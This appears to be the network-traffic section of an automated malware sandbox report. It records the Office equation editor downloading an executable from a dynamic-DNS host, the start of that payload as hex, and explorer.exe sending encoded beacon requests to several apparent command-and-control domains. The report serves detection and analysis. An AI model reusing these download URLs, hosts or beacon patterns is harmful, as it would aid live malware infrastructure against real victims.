                                                                                                                                                                                                    Apr 12, 2021 11:39:17.081425905 CEST8.8.8.8192.168.2.220x2f03No error (0)www.thesixteenthround.netparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                    Apr 12, 2021 11:39:17.081425905 CEST8.8.8.8192.168.2.220x2f03No error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                                                                                                                                                                    Apr 12, 2021 11:39:17.081425905 CEST8.8.8.8192.168.2.220x2f03No error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                                                                                                                                                                    Apr 12, 2021 11:39:17.081425905 CEST8.8.8.8192.168.2.220x2f03No error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                                                                                                                                                                    Apr 12, 2021 11:39:17.081425905 CEST8.8.8.8192.168.2.220x2f03No error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                                                                                                                                                                    Apr 12, 2021 11:39:17.081425905 CEST8.8.8.8192.168.2.220x2f03No error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                                                                                                                                                                    Apr 12, 2021 11:39:17.081425905 CEST8.8.8.8192.168.2.220x2f03No error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                                                                                                                                                                    Apr 12, 2021 11:39:17.081425905 CEST8.8.8.8192.168.2.220x2f03No error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                                                                                                                                                                    Apr 12, 2021 11:39:22.846026897 CEST8.8.8.8192.168.2.220x3c4eNo error (0)www.qcmax.com104.128.125.95A (IP address)IN (0x0001)
                                                                                                                                                                                                    Apr 12, 2021 11:39:28.367567062 CEST8.8.8.8192.168.2.220x6ec7Name error (3)www.stone-master.infononenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                    Apr 12, 2021 11:39:33.467981100 CEST8.8.8.8192.168.2.220xf09aName error (3)www.thunderoffroadresort.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                    Apr 12, 2021 11:39:38.585093975 CEST8.8.8.8192.168.2.220x18f7No error (0)www.christlicheliebe.net144.76.242.196A (IP address)IN (0x0001)
                                                                                                                                                                                                    Apr 12, 2021 11:39:44.127324104 CEST8.8.8.8192.168.2.220x4b93No error (0)www.18598853855.comdns.95h5cdn.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                    Apr 12, 2021 11:39:44.127324104 CEST8.8.8.8192.168.2.220x4b93No error (0)dns.95h5cdn.com18.166.77.19A (IP address)IN (0x0001)
                                                                                                                                                                                                    Apr 12, 2021 11:39:49.805474997 CEST8.8.8.8192.168.2.220x9e1cNo error (0)www.starr2021.comwws.weddingwire.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                    Apr 12, 2021 11:39:49.805474997 CEST8.8.8.8192.168.2.220x9e1cNo error (0)wws.weddingwire.comgp-usea-elb-13pj8i7f0fbsh-1771787045.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                    Apr 12, 2021 11:39:49.805474997 CEST8.8.8.8192.168.2.220x9e1cNo error (0)gp-usea-elb-13pj8i7f0fbsh-1771787045.us-east-1.elb.amazonaws.com3.230.51.235A (IP address)IN (0x0001)
                                                                                                                                                                                                    Apr 12, 2021 11:39:49.805474997 CEST8.8.8.8192.168.2.220x9e1cNo error (0)gp-usea-elb-13pj8i7f0fbsh-1771787045.us-east-1.elb.amazonaws.com52.54.251.87A (IP address)IN (0x0001)

                                                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                                                    • stdypmrimelimtewsosq.dns.army
                                                                                                                                                                                                    • www.playfulpainters.com
                                                                                                                                                                                                    • www.hostvngiare.com
                                                                                                                                                                                                    • www.thesixteenthround.net
                                                                                                                                                                                                    • www.qcmax.com
                                                                                                                                                                                                    • www.christlicheliebe.net
                                                                                                                                                                                                    • www.18598853855.com
                                                                                                                                                                                                    • www.starr2021.com

                                                                                                                                                                                                    HTTP Packets

                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    0192.168.2.2249170103.141.138.11780C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Apr 12, 2021 11:38:08.700448990 CEST71OUTGET /documepnt/winlog.exe HTTP/1.1
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Host: stdypmrimelimtewsosq.dns.army
                                                                                                                                                                                                    Apr 12, 2021 11:38:08.963999033 CEST72INHTTP/1.1 200 OK
                                                                                                                                                                                                    Date: Mon, 12 Apr 2021 09:38:07 GMT
                                                                                                                                                                                                    Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.2.34
                                                                                                                                                                                                    Last-Modified: Wed, 07 Apr 2021 13:42:46 GMT
                                                                                                                                                                                                    ETag: "324f1-5bf621b210103"
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Content-Length: 206065
                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-msdownload
                                                                                                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e5 6c 4a a8 a1 0d 24 fb a1 0d 24 fb a1 0d 24 fb 2f 05 7b fb a3 0d 24 fb a1 0d 25 fb 39 0d 24 fb 22 05 79 fb b0 0d 24 fb f5 2e 14 fb a8 0d 24 fb 66 0b 22 fb a0 0d 24 fb 52 69 63 68 a1 0d 24 fb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 1d cd 38 45 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 86 02 00 00 04 00 00 66 31 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 03 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 74 00 00 b4 00 00 00 00 80 03 00 67 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fe 5b 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fe 11 00 00 00 70 00 00 00 12 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d4 64 02 00 00 90 00 00 00 04 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 67 05 00 00 00 80 03 00 00 06 00 00 00 76 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$lJ$$$/{$%9$"y$.$f"$Rich$PEL8E\f1p@Ptgp.text[\ `.rdatap`@@.datadr@.ndata.rsrcgv@@


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    1192.168.2.224917134.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Apr 12, 2021 11:39:06.563976049 CEST289OUTGET /aqu2/?NP=K5Kf6zcgTMboCFmhMfN1gGfLaJuyFjl9HZYEWhqsekuFhK5NTINkzxSmehZhuXmdAQL3VA==&Yzrt=nN6d4T HTTP/1.1
                                                                                                                                                                                                    Host: www.playfulpainters.com
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    Apr 12, 2021 11:39:06.765571117 CEST289INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                    Server: openresty
                                                                                                                                                                                                    Date: Mon, 12 Apr 2021 09:39:06 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Content-Length: 275
                                                                                                                                                                                                    ETag: "60733cbf-113"
                                                                                                                                                                                                    Via: 1.1 google
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    2192.168.2.2249172104.21.71.7680C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Apr 12, 2021 11:39:11.909651041 CEST290OUTGET /aqu2/?NP=s46ojqJle3Soul44eo8rnM8O95xci96QFJKF/CkhZ8StqcbPmW9gr+kDew9qIR65/st6pQ==&Yzrt=nN6d4T HTTP/1.1
                                                                                                                                                                                                    Host: www.hostvngiare.com
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    Apr 12, 2021 11:39:11.981149912 CEST291INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Date: Mon, 12 Apr 2021 09:39:11 GMT
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                    Expires: Mon, 12 Apr 2021 10:39:11 GMT
                                                                                                                                                                                                    Location: https://www.hostvngiare.com/aqu2/?NP=s46ojqJle3Soul44eo8rnM8O95xci96QFJKF/CkhZ8StqcbPmW9gr+kDew9qIR65/st6pQ==&Yzrt=nN6d4T
                                                                                                                                                                                                    cf-request-id: 09670c19cb0000068e830b1000000001
                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ZyBOrU4ckO7e3WehDe3r2bcSTKPUJAttYkMq%2BXaQBnlHHpuxL5dSNDKSpvRJP2FBB8MMysd95tPHkcApLTFmbUtaIVwhCuGHzAclt6yhI0qu8R0d"}],"max_age":604800,"group":"cf-nel"}
                                                                                                                                                                                                    NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                    CF-RAY: 63eb7c6faf58068e-LHR
                                                                                                                                                                                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    3192.168.2.2249173198.54.117.21280C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Apr 12, 2021 11:39:17.281395912 CEST292OUTGET /aqu2/?NP=s0A+R2zuZA1+LPHAc9M/AmUzyN8aP2GBLv9J4fG53S1jdbvs3uSd9usyNyOEpwpEqUbLdg==&Yzrt=nN6d4T HTTP/1.1
                                                                                                                                                                                                    Host: www.thesixteenthround.net
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                    Data Ascii:


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    4192.168.2.2249174104.128.125.9580C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Apr 12, 2021 11:39:23.036487103 CEST293OUTGET /aqu2/?NP=toEAtfX1LDSonbWoA+2t7dOdvm85giv91wk/sm/PalfrX1ye/8l3cmSiDehl2Pz5Hv2v/g==&Yzrt=nN6d4T HTTP/1.1
                                                                                                                                                                                                    Host: www.qcmax.com
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    Apr 12, 2021 11:39:23.232377052 CEST294INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: Tengine
                                                                                                                                                                                                    Date: Mon, 12 Apr 2021 09:39:23 GMT
                                                                                                                                                                                                    Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                    Data Raw: 33 34 31 0d 0a 0a 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 5f 68 6d 74 20 3d 20 5f 68 6d 74 20 7c 7c 20 5b 5d 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 76 61 72 20 68 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0a 20 20 68 6d 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 64 63 34 64 64 62 66 32 62 33 66 65 65 66 64 61 35 35 37 35 30 61 66 34 34 30 35 35 30 32 31 62 22 3b 0a 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 20 0a 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 68 6d 2c 20 73 29 3b 0a 7d 29 28 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 0a 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 341<html><head><script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?dc4ddbf2b3feefda55750af44055021b"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script><title>502 Bad Gateway</title></head><body bgcolor="white"><center><h1>502 Bad Gateway</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    5192.168.2.2249175144.76.242.19680C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Apr 12, 2021 11:39:38.657286882 CEST295OUTGET /aqu2/?NP=n0kajkVKrFhs8OXGdIr62gA+iBln1jDamJdU2gSjeygeLyUnpUxBQzZrsA56E2MZ1cixJw==&Yzrt=nN6d4T HTTP/1.1
                                                                                                                                                                                                    Host: www.christlicheliebe.net
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    Apr 12, 2021 11:39:38.728241920 CEST296INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Mon, 12 Apr 2021 09:39:38 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Content-Length: 808
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Last-Modified: Sat, 27 Jul 2019 17:29:53 GMT
                                                                                                                                                                                                    ETag: "328-58ead01c2b1d3"
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 5f 64 6f 63 73 2f 73 74 79 6c 65 73 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 67 65 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 64 65 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 68 32 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 54 68 69 73 20 70 61 67 65 20 65 69 74 68 65 72 20 64 6f 65 73 6e 27 74 20 65 78 69 73 74 2c 20 6f 72 20 69 74 20 6d 6f 76 65 64 20 73 6f 6d 65 77 68 65 72 65 20 65 6c 73 65 2e 3c 2f 70 3e 0a 20 20 20 20 3c 68 72 2f 3e 0a 20 20 20 20 3c 70 3e 54 68 61 74 27 73 20 77 68 61 74 20 79 6f 75 20 63 61 6e 20 64 6f 3c 2f 70 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 6c 70 2d 61 63 74 69 6f 6e 73 22 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 22 3e 52 65 6c 6f 61 64 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 29 3b 22 3e 42 61 63 6b 20 74 6f 20 50 72 65 76 69 6f 75 73 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 48 6f 6d 65 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>404 Not Found</title> <link rel="stylesheet" href="/error_docs/styles.css"></head><body><div class="page"> <div class="main"> <h1>Server Error</h1> <div class="error-code">404</div> <h2>Page Not Found</h2> <p class="lead">This page either doesn't exist, or it moved somewhere else.</p> <hr/> <p>That's what you can do</p> <div class="help-actions"> <a href="javascript:location.reload();">Reload Page</a> <a href="javascript:history.back();">Back to Previous Page</a> <a href="/">Home Page</a> </div> </div></div></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    6192.168.2.224917618.166.77.1980C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Apr 12, 2021 11:39:44.359040976 CEST297OUTGET /aqu2/?NP=mL9TVQaOR/c/9ivG5fkw1nXZWj4Nbf+dNa5NuWBK0bSYoDjNDzx/n8mD4eDtsAuI9QTUuQ==&Yzrt=nN6d4T HTTP/1.1
                                                                                                                                                                                                    Host: www.18598853855.com
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    Apr 12, 2021 11:39:44.587743044 CEST298INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Mon, 12 Apr 2021 09:39:44 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Content-Length: 138
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Location: https://www.18598853855.com#/?shareName=www.18598853855.com
                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    7192.168.2.22491773.230.51.23580C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Apr 12, 2021 11:39:49.934220076 CEST299OUTGET /aqu2/?NP=FDSTiZqS/7wu56xr5ud1XtYEDVJDcY6JSxG6s2Z614q4ZNLNR7otPveqGH1j6obhpY7v2w==&Yzrt=nN6d4T HTTP/1.1
                                                                                                                                                                                                    Host: www.starr2021.com
